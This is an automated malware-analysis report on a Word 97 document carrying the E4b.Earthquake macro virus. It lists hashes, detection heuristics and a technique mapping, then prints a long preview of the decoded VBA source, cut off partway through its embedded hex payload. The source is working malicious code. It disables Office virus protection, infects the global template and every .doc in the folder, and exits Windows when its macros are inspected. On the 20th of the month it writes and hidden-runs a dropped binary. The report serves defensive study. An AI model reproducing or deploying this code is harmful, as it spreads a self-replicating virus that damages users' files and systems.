Office (OLE) malware analysis — malicious · 985161ee32e2e3ee

MALICIOUS

Office (OLE)

83.5 KB Created: 2001-03-08 10:56:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 056c083839d92748b8f83ffa884a27ec SHA-1: 8808af75f46bbdd5e3caf05ae62cae3641bc2583 SHA-256: 985161ee32e2e3ee83b6285396aec4b584fe90e62e382b5680f4174be054850f

256 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

This legacy Word document contains a WordBasic macro virus, identified by multiple heuristics including OLE_LEGACY_WORDBASIC_MACRO_VIRUS and OLE_VBA_PCODE_AUTOEXEC_EXEC. The AutoOpen and AutoClose macros are present, and the critical OLE_VBA_SHELL heuristic indicates the execution of arbitrary code. The script attempts to execute 'c:\start.scr' and 'c:\startv.bat' on the 20th day of the month, and exports its own code to 'c:\E4.sys', suggesting a downloader or dropper functionality.

Heuristics 7

ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Pivis-2
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell ("c:\startv.bat"), vbHide
```
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
Options.VirusProtection = False
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Sub AutoClose()
```
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 90882 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	90882 bytes
SHA-256: `5c5d33b0f30a71c0581315a7e78fbe58d523916b1e563b533a85239c29116f11`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "E4" Sub E4() On Error Resume Next ' The E4b.Earthquake Virus ' Based on the E4b Virus Core ' Word 97 Macro Virus all Service Packs ' Created on the 21st May 2000 ' Created for Testing & Educational Purposes ONLY ' Not for Main Stream Distribution Options.ConfirmConversions = False Options.VirusProtection = False Options.SaveNormalPrompt = False CommandBars("Tools").Controls("Macro").Delete CommandBars("Tools").Controls("Templates and Add-Ins...").Delete CommandBars("Format").Controls("Style...").Delete If Day(Now()) = 20 Then Call Prog("C:\start.scr") If Day(Now()) = 20 Then Call startv("c:\startv.bat") Application.VBE.ActiveVBProject.VBComponents("E4").Export "c:\E4.sys" For I = 1 To NormalTemplate.VBProject.VBComponents.Count If NormalTemplate.VBProject.VBComponents(I).Name = "E4" Then NormInstall = True Next I For I = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(I).Name = "E4" Then ActivInstall = True Next I If ActivInstall = True And NormInstall = False Then Set Lotion = NormalTemplate.VBProject _ Else If ActivInstall = False And NormInstall = True Then Set Lotion = ActiveDocument.VBProject Lotion.VBComponents.Import ("c:\E4.sys") End Sub Sub FileNew() On Error Resume Next Call E4 Dialogs(wdDialogFileNew).Show Skip = 1 Call E4 End Sub Sub FileSave() On Error Resume Next Call E4 ActiveDocument.Save End Sub Sub FileClose() On Error Resume Next Call E4 If ActiveDocument.Saved = False Then ActiveDocument.Save ActiveDocument.Close End Sub Sub ToolsOptions() On Error Resume Next Dialogs(wdDialogToolsOptions).Show Call E4 End Sub Sub EditFind() On Error Resume Next Dialogs(wdDialogEditFind).Show Call E4 End Sub Sub FileSaveAs() On Error Resume Next Dialogs(wdDialogFileSaveAs).Show Call E4 End Sub Sub FilePrint() On Error Resume Next Dialogs(wdDialogFilePrint).Show Call E4 End Sub Sub FileExit() On Error Resume Next Call E4 If ActiveDocument.Saved = False Then ActiveDocument.Save Application.WindowState = wdWindowStateMinimize pName = CurDir & "\" fName = Dir(pName & ".doc", sAttr) If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="" Call E4 Do While (fName <> "") fName = Dir() If (fName <> "") And _ ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="" Call E4 If ActiveDocument.Saved = False Then ActiveDocument.Save End If Loop Application.Quit End Sub Sub AutoExit() On Error Resume Next Call E4 Application.WindowState = wdWindowStateMinimize pName = CurDir & "\" fName = Dir(pName & ".doc", sAttr) If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="" Call E4 Do While (fName <> "") fName = Dir() If (fName <> "") And _ ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _ False, AddToRecentFiles:=False, PasswordDocument:="" Call E4 If ActiveDocument.Saved = False Then ActiveDocument.Save End If Loop End Sub Sub AutoOpen() On Error Resume Next Call E4 End Sub Sub AutoExec() On Error Resume Next Call E4 End Sub Sub AutoClose() On Error Resume Next Call E4 End Sub Sub ToolsMacro() On Error Resume Next Call EPay End Sub Sub FileTemplates() On Error Resume Next Call EPay End Sub Sub ViewVBCode() On Error Resume Next Call EPay End Sub Sub EPay() On Error Resume Next If ActiveDocument.Saved = False Then ActiveDocument.Save Tasks.ExitWindows End Sub Sub Prog(strFile As String) On Error Resume Next Dim hFile As Long hFile = FreeFile Open strFile For Output Access Write As hFile Print #hFile, "N start.com" Print #hFile, "E 0100 4D 5A 36 01 01 00 00 00 04 00 00 00 FF FF 00 00" Print #hFile, "E 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00" Print #hFile, "E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #hFile, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00" Print #hFile, "E 0140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68" Print #hFile, "E 0150 69 73 20 70 72 6F 67 72 61 6D 20 72 65 71 75 69" Print #hFile, "E 0160 72 65 73 20 4D 69 63 72 6F 73 6F 66 74 20 57 69" Print #hFile, "E 0170 6E 64 6F 77 73 2E 0D 0A 24 00 00 00 00 00 00 00" Print #hFile, "E 0180 4E 45 05 3C 9F 00 0F 00 00 00 00 00 02 03 02 00" Print #hFile, "E 0190 00 04 00 14 1A 00 01 00 00 00 02 00 02 00 02 00" Print #hFile, "E 01A0 3D 00 40 00 50 00 85 00 8E 00 92 00 2E 01 00 00" Print #hFile, "E 01B0 02 00 04 00 00 00 02 08 18 00 0C 01 00 00 0A 03" Print #hFile, "E 01C0 1A 00 39 0C 50 1D 39 0C F6 00 94 02 51 0C 94 02" Print #hFile, "E 01D0 04 00 0E 80 01 00 00 00 00 00 24 01 02 00 30 1C" Print #hFile, "E 01E0 2C 00 00 00 00 00 03 80 01 00 00 00 00 00 26 01" Print #hFile, "E 01F0 2F 00 30 1C 01 80 00 00 00 00 00 00 08 41 4C 4F" Print #hFile, "E 0200 41 50 49 43 4F 05 41 4C 4F 41 50 00 00 00 01 00" Print #hFile, "E 0210 08 00 00 06 4B 45 52 4E 45 4C 04 55 53 45 52 02" Print #hFile, "E 0220 FF 01 CD 3F 01 16 0A 01 CD 3F 01 18 0B 00 15 41" Print #hFile, "E 0230 20 6D 69 6E 69 6D 75 6D 20 41 70 70 6C 69 63 61" Print #hFile, "E 0240 74 69 6F 6E 00 00 09 45 58 43 49 54 50 52 4F 43" Print #hFile, "E 0250 02 00 15 4F 56 45 52 4C 41 50 50 45 44 57 49 4E" Print #hFile, "E 0260 44 4F 57 50 52 4F 43 31 01 00 00 00 00 00 00 00" Print #hFile, "E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #hFile, "E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #hFile, "E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #hFile, "E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" Print #hFile, "E 02B0 FF FF B0 FF 50 9A DD 01 3C 0B 33 ED 55 9A FF FF" Print #hFile, "E 02C0 00 00 0B C0 74 EC 8C 06 46 00 81 C1 00 01 72 E2" Print #hFile, "E 02D0 89 0E 10 00 89 36 12 00 89 3E 14 00 89 1E 16 00" Print #hFile, "E 02E0 8C 06 18 00 89 16 1A 00 9A FF FF 00 00 86 C4 A3" Print #hFile, "E 02F0 48 00 B4 30 2E F7 06 10 00 01 00 74 07 9A FF FF" Print #hFile, "E 0300 00 00 EB 02 CD 21 A3 4C 00 86 C4 A3 4A 00 2E F7" Print #hFile, "E 0310 06 10 00 01 00 75 05 B0 00 A2 4F 00 33 C0 50 9A" Print #hFile, "E 0320 FF FF 00 00 FF 36 14 00 9A FF FF 00 00 0B C0 74" Print #hFile, "E 0330 81 9A F0 00 18 00 9A D4 02 94 00 9A 56 04 99 00" Print #hFile, "E 0340 E8 43 07 FF 36 84 00 FF 36 82 00 FF 36 80 00 9A" Print #hFile, "E 0350 C4 00 9E 00 83 C4 06 50 9A CF 01 B2 00 B8 15 00" Print #hFile, "E 0360 E9 28 04 00 8C D8 90 45 55 8B EC 1E 8E D8 FF 36" Print #hFile, "E 0370 14 00 FF 36 12 00 FF 36 18 00 FF 36 16 00 FF 36" Print #hFile, "E 0380 1A 00 9A F0 08 BB 00 83 ED 02 8B E5 1F 5D 4D CB" Print #hFile, "E 0390 8C D8 90 45 55 8B EC 1E 8E D8 B8 00 35 2E F7 06" Print #hFile, "E 03A0 10 00 01 00 74 07 9A 5E 00 00 00 EB 02 CD 21 89" Print #hFile, "E 03B0 1E 32 00 8C 06 34 00 0E 1F B8 00 25 BA E6 04 2E" Print #hFile, "E 03C0 F7 06 10 00 01 00 74 07 9A 07 01 00 00 EB 02 CD" Print #hFile, "E 03D0 21 16 1F 8B 0E 1E 01 E3 29 8E 06 46 00 26 8B 36" Print #hFile, "E 03E0 2C 00 A1 20 01 8B 16 22 01 33 DB FF 1E 1C 01 73" Print #hFile, "E 03F0 03 E9 7A 01 A1 24 01 8B 16 26 01 BB 03 00 FF 1E" Print #hFile, "E 0400 1C 01 8E 06 46 00 26 8B 0E 2C 00 E3 3E 8E C1 33" Print #hFile, "E 0410 FF 26 80 3D 00 74 34 B9 0D 00 BE 24 00 F3 A6 74" Print #hFile, "E 0420 0B B9 FF 7F 33 C0 F2 AE 75 21 EB E5 06 1E 07 1F" Print #hFile, "E 0430 8B F7 BF 58 00 B1 04 AC 2C 41 72 0D D2 E0 92 AC" Print #hFile, "E 0440 2C 41 72 05 0A C2 AA EB EE 16 1F BE 28 01 BF 28" Print #hFile, "E 0450 01 E8 E2 00 BE 28 01 BF 28 01 E8 D9 00 BE 28 01" Print #hFile, "E 0460 BF 28 01 E8 D0 00 83 ED 02 8B E5 1F 5D 4D CB 8C" Print #hFile, "E 0470 D8 90 45 55 8B EC 1E 8E D8 33 C9 EB 2F 8C D8 90" Print #hFile, "E 0480 45 55 8B EC 1E 8E D8 B9 01 00 EB 20 8C D8 90 45" Print #hFile, "E 0490 55 8B EC 1E 8E D8 56 57 B9 00 01 EB 0F 8C D8 90" Print #hFile, "E 04A0 45 55 8B EC 1E 8E D8 56 57 B9 01 01 88 2E 8D 00" Print #hFile, "E 04B0 51 0A C9 75 1C BE 8A 02 BF 8A 02 E8 78 00 BE 28" Print #hFile, "E 04C0 01 BF 28 01 E8 6F 00 8B 76 06 56 E8 B8 05 83 C4" Print #hFile, "E 04D0 02 BE 28 01 BF 28 01 E8 5C 00 BE 28 01 BF 28 01" Print #hFile, "E 04E0 E8 53 00 E8 27 00 58 0A E4 75 17 8B 46 06 B4 4C" Print #hFile, "E 04F0 2E F7 06 10 00 01 00 74 07 9A 29 01 00 00 EB 02" Print #hFile, "E 0500 CD 21 5F 5E 83 ED 02 8B E5 1F 5D 4D CB 8B 0E 1E" Print #hFile, "E 0510 01 E3 07 BB 02 00 FF 1E 1C 01 1E C5 16 32 00 B8" Print #hFile, "E 0520 00 25 2E F7 06 10 00 01 00 74 07 9A 5A 02 00 00" Print #hFile, "E 0530 EB 02 CD 21 1F C3 3B F7 73 0E 83 EF 04 8B 05 0B" Print #hFile, "E 0540 45 02 74 F2 FF 1D EB EE C3 00 8C D8 90 45 55 8B" Print #hFile, "E 0550 EC 1E 8E D8 B8 FC 00 50 0E E8 A9 02 B8 FF 00 50" Print #hFile, "E 0560 0E E8 A1 02 83 ED 02 8B E5 1F 5D 4D CB 00 B8 02" Print #hFile, "E 0570 00 E9 17 02 8F 06 92 00 8F 06 94 00 B8 04 01 B9" Print #hFile, "E 0580 08 00 E8 BD 02 89 16 88 00 A3 86 00 52 50 FF 36" Print #hFile, "E 0590 14 00 52 50 B8 04 01 50 9A FF FF 00 00 5B 07 03" Print #hFile, "E 05A0 D8 26 C6 07 00 BA 01 00 BF 01 00 BE 81 00 8E 1E" Print #hFile, "E 05B0 46 00 AC 3C 20 74 FB 3C 09 74 F7 3C 0D 74 6F 0A" Print #hFile, "E 05C0 C0 74 6B 47 4E AC 3C 20 74 E8 3C 09 74 E4 3C 0D" Print #hFile, "E 05D0 74 5C 0A C0 74 58 3C 22 74 24 3C 5C 74 03 42 EB" Print #hFile, "E 05E0 E4 33 C9 41 AC 3C 5C 74 FA 3C 22 74 04 03 D1 EB" Print #hFile, "E 05F0 D3 8B C1 D1 E9 13 D1 A8 01 75 CA EB 01 4E AC 3C" Print #hFile, "E 0600 0D 74 2B 0A C0 74 27 3C 22 74 BA 3C 5C 74 03 42" Print #hFile, "E 0610 EB EC 33 C9 41 AC 3C 5C 74 FA 3C 22 74 04 03 D1" Print #hFile, "E 0620 EB DB 8B C1 D1 E9 13 D1 A8 01 75 D2 EB 97 16 1F" Print #hFile, "E 0630 89 3E 80 00 03 D7 47 D1 E7 03 D7 42 80 E2 FE 2B" Print #hFile, "E 0640 E2 8B C4 A3 82 00 8B D8 03 FB 16 07 C5 36 86 00" Print #hFile, "E 0650 36 89 37 43 43 36 8E 1E 46 00 BE 81 00 EB 03 33" Print #hFile, "E 0660 C0 AA AC 3C 20 74 FB 3C 09 74 F7 3C 0D 74 7C 0A" Print #hFile, "E 0670 C0 74 78 36 89 3F 43 43 4E AC 3C 20 74 E1 3C 09" Print #hFile, "E 0680 74 DD 3C 0D 74 62 0A C0 74 5E 3C 22 74 27 3C 5C" Print #hFile, "E 0690 74 03 AA EB E4 33 C9 41 AC 3C 5C 74 FA 3C 22 74" Print #hFile, "E 06A0 06 B0 5C F3 AA EB D1 B0 5C D1 E9 F3 AA 73 06 B0" Print #hFile, "E 06B0 22 AA EB C5 4E AC 3C 0D 74 2E 0A C0 74 2A 3C 22" Print #hFile, "E 06C0 74 B7 3C 5C 74 03 AA EB EC 33 C9 41 AC 3C 5C 74" Print #hFile, "E 06D0 FA 3C 22 74 06 B0 5C F3 AA EB D9 B0 5C D1 E9 F3" Print #hFile, "E 06E0 AA 73 96 B0 22 AA EB CD 33 C0 AA 16 1F C7 07 00" Print #hFile, "E 06F0 00 FF 2E 92 00 00 8C D8 90 45 55 8B EC 1E 8E D8" Print #hFile, "E 0700 1E 9A FF FF 00 00 0B C0 74 03 BA 00 00 8B DA 8E" Print #hFile, "E 0710 C2 33 C0 33 F6 33 FF B9 FF FF 0B DB 74 0E 26 80" Print #hFile, "E 0720 3E 00 00 00 74 06 F2 AE 46 AE 75 FA 8B C7 40 24" Print #hFile, "E 0730 FE 46 8B FE D1 E6 B9 09 00 E8 06 01 50 8B C6 E8" Print #hFile, "E 0740 00 01 A3 84 00 06 1E 07 1F 8B CF 8B D8 33 F6 5F" Print #hFile, "E 0750 49 E3 26 8B 04 36 3B 06 24 00 75 10 51 56 57 BF" Print #hFile, "E 0760 24 00 B9 06 00 F3 A7 5F 5E 59 74 05 26 89 3F 43" Print #hFile, "E 0770 43 AC AA 0A C0 75 FA E2 DA 26 89 0F 1F 83 ED 02" Print #hFile, "E 0780 8B E5 1F 5D 4D CB 16 1F B8 03 00 50 50 0E E8 B9" Print #hFile, "E 0790 FD 0E E8 70 00 0E E8 35 00 33 DB 0B C0 74 1D 8B" Print #hFile, "E 07A0 F8 B8 09 00 80 3D 4D 75 03 B8 0F 00 03 F8 57 1E" Print #hFile, "E 07B0 07 B0 0D B9 22 00 F2 AE 88 5D FF 58 53 1E 50 9A" Print #hFile, "E 07C0 FF FF 00 00 B8 FF 00 50 9A FF FF 00 00 00 8C D8" Print #hFile, "E 07D0 90 45 55 8B EC 1E 8E D8 56 57 1E 07 8B 56 06 BE" Print #hFile, "E 07E0 30 01 AD 3B C2 74 10 40 96 74 0C 97 33 C0 B9 FF" Print #hFile, "E 07F0 FF F2 AE 8B F7 EB EB 96 5F 5E 83 ED 02 8B E5 1F" Print #hFile, "E 0800 5D 4D CA 02 00 8C D8 90 45 55 8B EC 1E 8E D8 57" Print #hFile, "E 0810 83 3E 9C 00 00 74 1F FF 76 06 0E E8 B0 FF 0B C0" Print #hFile, "E 0820 74 14 92 8B FA 33 C0 B9 FF FF F2 AE F7 D1 49 8B" Print #hFile, "E 0830 1E 52 00 E8 55 02 5F 83 ED 02 8B E5 1F 5D 4D CA" Print #hFile, "E 0840 02 00 55 8B EC 53 06 51 B9 00 10 87 0E 96 00 51" Print #hFile, "E 0850 50 9A F2 07 E5 00 5B 8F 06 96 00 59 8C DA 0B C0" Print #hFile, "E 0860 74 04 07 5B EB 05 8B C1 E9 20 FF 8B E5 5D C3 00" Print #hFile, "E 0870 51 57 F6 47 02 01 74 63 E8 E7 00 8B FE 8B 04 A8" Print #hFile, "E 0880 01 74 03 2B C8 49 41 41 8B 77 04 0B F6 74 4C 03" Print #hFile, "E 0890 CE 73 09 33 C0 BA F0 FF E3 30 EB 3F 16 07 26 A1" Print #hFile, "E 08A0 96 00 3D 00 10 74 16 BA 00 80 3B D0 72 06 D1 EA" Print #hFile, "E 08B0 75 F8 EB 22 83 FA 08 72 1D D1 E2 8B C2 48 8B D0" Print #hFile, "E 08C0 03 C1 73 02 33 C0 F7 D2 23 C2 52 E8 2E 00 5A 73" Print #hFile, "E 08D0 0D 83 FA F0 74 05 B8 10 00 EB E2 F9 EB 1B 8B D0" Print #hFile, "E 08E0 2B 57 04 89 47 04 89 7F 0A 8B 77 0C 4A 89 14 42" Print #hFile, "E 08F0 03 F2 C7 04 FE FF 89 77 0C 5F 59 C3 8B D0 F6 47" Print #hFile, "E 0900 02 04 74 02 EB 51 52 51 53 8B 77 06 2E 8B 1E 10" Print #hFile, "E 0910 00 33 C9 0B D2 75 07 F7 C3 10 00 75 40 41 B8 02" Print #hFile, "E 0920 00 F7 C3 01 00 75 03 B8 20 00 56 51 52 50 9A FF" Print #hFile, "E 0930 FF 00 00 0B C0 74 26 3B C6 75 1C 56 9A FF FF 00" Print #hFile, "E 0940 00 0B D0 74 12 5B 59 5A 8B C2 F6 47 02 04 74 04" Print #hFile, "E 0950 4A 89 57 FE F8 EB 0A B8 12 00 E9 2E FE 5B 59 5A" Print #hFile, "E 0960 F9 C3 57 8B 77 0A 3B 77 0C 75 03 8B 77 08 AD 83" Print #hFile, "E 0970 F8 FE 74 08 8B FE 24 FE 03 F0 EB F2 4F 4F 8B F7" Print #hFile, "E 0980 5F C3 45 55 8B EC 1E 8B 46 06 A3 98 00 C7 06 9A" Print #hFile, "E 0990 00 00 00 8D 66 FE 1F 5D 4D CB 45 55 8B EC 1E B8" Print #hFile, "E 09A0 FD 43 BA 03 00 52 50 FF 36 9A 00 FF 36 98 00 9A" Print #hFile, "E 09B0 2E 07 B4 05 05 C3 9E 83 D2 26 A3 98 00 89 16 9A" Print #hFile, "E 09C0 00 8B C2 80 E4 7F 8D 66 FE 1F 5D 4D CB 90 55 8B" Print #hFile, "E 09D0 EC 8B 46 08 8B 4E 0C 0B C8 8B 4E 0A 75 09 8B 46" Print #hFile, "E 09E0 06 F7 E1 5D CA 08 00 53 F7 E1 8B D8 8B 46 06 F7" Print #hFile, "E 09F0 66 0C 03 D8 8B 46 06 F7 E1 03 D3 5B 5D CA 08 00" Print #hFile, "E 0A00 55 8B EC 33 C0 8B 4E 0E E3 79 1E 57 56 C5 76 06" Print #hFile, "E 0A10 C4 7E 0A 8B C1 48 8B D7 F7 D2 2B C2 1B DB 23 C3" Print #hFile, "E 0A20 03 C2 8B D6 F7 D2 2B C2 1B DB 23 C3 03 C2 40 91" Print #hFile, "E 0A30 2B C1 92 AC 26 8A 25 3A E0 75 1F 47 E2 F5 92 91" Print #hFile, "E 0A40 E3 3E 0B F6 75 07 8C D8 05 FF FF 8E D8 0B FF 75" Print #hFile, "E 0A50 C2 8C C0 05 A9 07 8E C0 EB B9 2C 41 3C 1A 1A DB" Print #hFile, "E 0A60 80 E3 20 02 C3 04 41 80 EC 41 80 FC 1A 1A DB 80" Print #hFile, "E 0A70 E3 20 02 E3 80 C4 41 3A C4 74 C0 1B C0 83 D8 FF" Print #hFile, "E 0A80 5E 5F 1F 5D CB 00 55 8B EC 5D C3 B8 14 00 E9 FA" Print #hFile, "E 0A90 FC 00 45 55 8B EC 1E 83 EC 02 83 7E 06 00 75 05" Print #hFile, "E 0AA0 C7 46 06 01 00 B8 FF FF 50 9A 9F 08 00 00 B8 20" Print #hFile, "E 0AB0 00 50 FF 76 06 9A FF FF 00 00 89 46 FC B8 FF FF" Print #hFile, "E 0AC0 50 9A C7 08 00 00 83 7E FC 00 75 17 A1 A0 00 0B" Print #hFile, "E 0AD0 06 9E 00 74 0E FF 76 06 FF 1E 9E 00 83 C4 02 0B" Print #hFile, "E 0AE0 C0 75 C2 8B 46 FC 8D 66 FE 1F 5D 4D CB 90 45 55" Print #hFile, "E 0AF0 8B EC 1E 83 7E 06 00 74 08 FF 76 06 9A FF FF 00" Print #hFile, "E 0B00 00 8D 66 FE 1F 5D 4D CB 45 55 8B EC 1E 83 EC 04" Print #hFile, "E 0B10 83 7E 06 00 75 0E FF 76 08 9A F2 07 90 08 83 C4" Print #hFile, "E 0B20 02 EB 4B 90 83 7E 08 00 75 10 FF 76 06 9A 4E 08" Print #hFile, "E 0B30 12 07 83 C4 02 33 C0 EB 35 90 B8 FF FF 50 9A FF" Print #hFile, "E 0B40 FF 00 00 FF 76 06 83 7E 08 00 74 06 8B 46 08 EB" Print #hFile, "E 0B50 04 90 B8 01 00 50 B8 62 00 50 9A FF FF 00 00 89" Print #hFile, "E 0B60 46 FC B8 FF FF 50 9A FF FF 00 00 8B 46 FC 8D 66" Print #hFile, "E 0B70 FE 1F 5D 4D CB 90 45 55 8B EC 1E FF 76 06 9A FF" Print #hFile, "E 0B80 FF 00 00 8D 66 FE 1F 5D 4D CB 00 00 00 00 00 00" Print #hFile, "E 0B90 C8 02 00 00 56 83 7E 0C 00 74 19 9A FF FF 00 00" Print #hFile, "E 0BA0 50 1E 68 A8 00 1E 68 A2 00 6A 10 9A FF FF 00 00" Print #hFile, "E 0BB0 33 C0 EB 30 8B 76 FE FF 76 06 FF 76 0A FF 76 08" Print #hFile, "E 0BC0 FF 76 0C FF 76 0E 9A 4A 09 38 09 83 C4 0A 0B C0" Print #hFile, "E 0BD0 74 10 FF 76 0E 9A E4 09 40 09 5B 8B F0 9A 14 0A" Print #hFile, "E 0BE0 FF FF 8B C6 5E C9 CA 0A 00 00 C8 1A 00 00 56 8B" Print #hFile, "E 0BF0 76 06 83 7E 08 00 75 4F C7 46 E6 00 00 C7 46 E8" Print #hFile, "E 0C00 16 0A C7 46 EA 29 09 33 C0 89 46 EC 89 46 EE 89" Print #hFile, "E 0C10 76 F0 56 1E 68 C2 00 9A FF FF 00 00 89 46 F2 C7" Print #hFile, "E 0C20 46 F4 00 00 C7 46 F6 02 00 2B C0 89 46 FA 89 46" Print #hFile, "E 0C30 F8 C7 46 FC CC 00 8C 5E FE 8D 46 E6 16 50 9A FF" Print #hFile, "E 0C40 FF 00 00 0B C0 74 39 1E 68 CC 00 1E 68 DA 00 68" Print #hFile, "E 0C50 08 20 6A 00 68 00 80 68 00 80 68 00 80 68 00 80" Print #hFile, "E 0C60 6A 00 6A 00 56 6A 00 6A 00 9A FF FF 00 00 A3 92" Print #hFile, "E 0C70 02 89 36 90 02 50 6A 07 9A FF FF 00 00 A1 92 02" Print #hFile, "E 0C80 5E C9 CB 00 C8 12 00 00 EB 14 8D 46 EE 16 50 9A" Print #hFile, "E 0C90 FF FF 00 00 8D 46 EE 16 50 9A FF FF 00 00 8D 46" Print #hFile, "E 0CA0 EE 16 50 6A 00 6A 00 6A 00 9A FF FF 00 00 0B C0" Print #hFile, "E 0CB0 75 D8 C9 CB CB 00 C8 14 00 00 57 56 8B 46 0C 48" Print #hFile, "E 0CC0 74 2D 48 75 03 E9 AC 00 2D 11 00 75 03 E9 DE 00" Print #hFile, "E 0CD0 2D 00 01 75 03 E9 BD 00 FF 76 0E FF 76 0C FF 76" Print #hFile, "E 0CE0 0A FF 76 08 FF 76 06 9A FF FF 00 00 E9 C2 00 8B" Print #hFile, "E 0CF0 76 0E 6A 00 9A 5F 0A 00 00 A3 7A 02 6A 01 9A FF" Print #hFile, "E 0D00 FF 00 00 A3 7C 02 56 68 4C 04 1E 68 A2 00 1E 68" Print #hFile, "E 0D10 E8 00 6A 1E 9A FF FF 00 00 8B F8 50 6A 00 6A 00" Print #hFile, "E 0D20 9A FF FF 00 00 57 1E 68 EE 00 8D 46 EC 16 50 9A" Print #hFile, "E 0D30 FF FF 00 00 83 C4 0A 1E 68 A2 00 1E 68 E8 00 8D" Print #hFile, "E 0D40 46 EC 16 50 9A B6 0A 00 00 1E 68 A2 00 1E 68 0A" Print #hFile, "E 0D50 01 1E 68 F2 00 9A FF FF 00 00 68 65 09 68 18 0B" Print #hFile, "E 0D60 FF 36 90 02 9A FF FF 00 00 A3 7E 02 89 16 80 02" Print #hFile, "E 0D70 56 E9 67 FF FF 36 80 02 FF 36 7E 02 9A FF FF 00" Print #hFile, "E 0D80 00 FF 76 0E 68 4C 04 9A FF FF 00 00 6A 00 9A FF" Print #hFile, "E 0D90 FF 00 00 EB 19 8B 46 0A 2D 4C 04 75 11 FF 36 80" Print #hFile, "E 0DA0 02 FF 36 7E 02 6A 00 6A 00 9A FF FF 00 00 33 C0" Print #hFile, "E 0DB0 99 5E 5F C9 CA 0A 00 00 C8 26 00 00 57 56 8B 76" Print #hFile, "E 0DC0 0A 56 8D 46 DA 16 50 6A 13 9A FF FF 00 00 6A 06" Print #hFile, "E 0DD0 1E 68 12 01 8D 46 DA 16 50 9A 60 07 A8 0B 83 C4" Print #hFile, "E 0DE0 0A 0B C0 74 1E 56 9A FF FF 00 00 0B C0 75 14 56" Print #hFile, "E 0DF0 9A FF FF 00 00 0B C0 74 0A 56 9A FF FF 00 00 0B" Print #hFile, "E 0E00 C0 75 03 E9 CA 00 56 8D 46 EE 16 50 9A FF FF 00" Print #hFile, "E 0E10 00 8B 46 F2 8B 7E EE 2B C7 89 46 FC 8B 46 F0 89" Print #hFile, "E 0E20 46 FE 2B 46 F4 F7 D8 89 46 FA 0B FF 7F 07 C7 46" Print #hFile, "E 0E30 F6 01 00 EB 29 8B 46 FC 03 C7 3B 06 7A 02 7C 05" Print #hFile, "E 0E40 B8 FF FF EB 16 9A FA 06 DF 0B 2D FF 3F 0B C0 7E" Print #hFile, "E 0E50 05 B8 01 00 EB 02 33 C0 03 C0 48 89 46 F6 83 7E" Print #hFile, "E 0E60 FE 00 7F 07 C7 46 F8 01 00 EB 2A 8B 46 FA 03 46" Print #hFile, "E 0E70 FE 3B 06 7C 02 7C 05 B8 FF FF EB 16 9A FA 06 F8" Print #hFile, "E 0E80 0B 2D FF 3F 0B C0 7E 05 B8 01 00 EB 02 33 C0 03" Print #hFile, "E 0E90 C0 48 89 46 F8 9A FA 06 0F 0C 8B C8 81 C1 E8 03" Print #hFile, "E 0EA0 69 46 F6 30 75 99 F7 F9 03 F8 56 57 9A FA 06 BB" Print #hFile, "E 0EB0 0A 8B C8 81 C1 E8 03 69 46 F8 30 75 99 F7 F9 03" Print #hFile, "E 0EC0 46 FE 50 FF 76 FC FF 76 FA 6A 01 9A FF FF 00 00" Print #hFile, "E 0ED0 B8 FF FF 5E 5F C9 CA 06 00 2E 00 03 01 F0 09 02" Print #hFile, "E 0EE0 00 71 00 03 01 FA 09 02 00 72 00 02 00 7C 08 01" Print #hFile, "E 0EF0 00 00 00 03 01 29 05 01 00 01 00 03 01 49 00 01" Print #hFile, "E 0F00 00 03 00 03 01 62 04 01 00 83 00 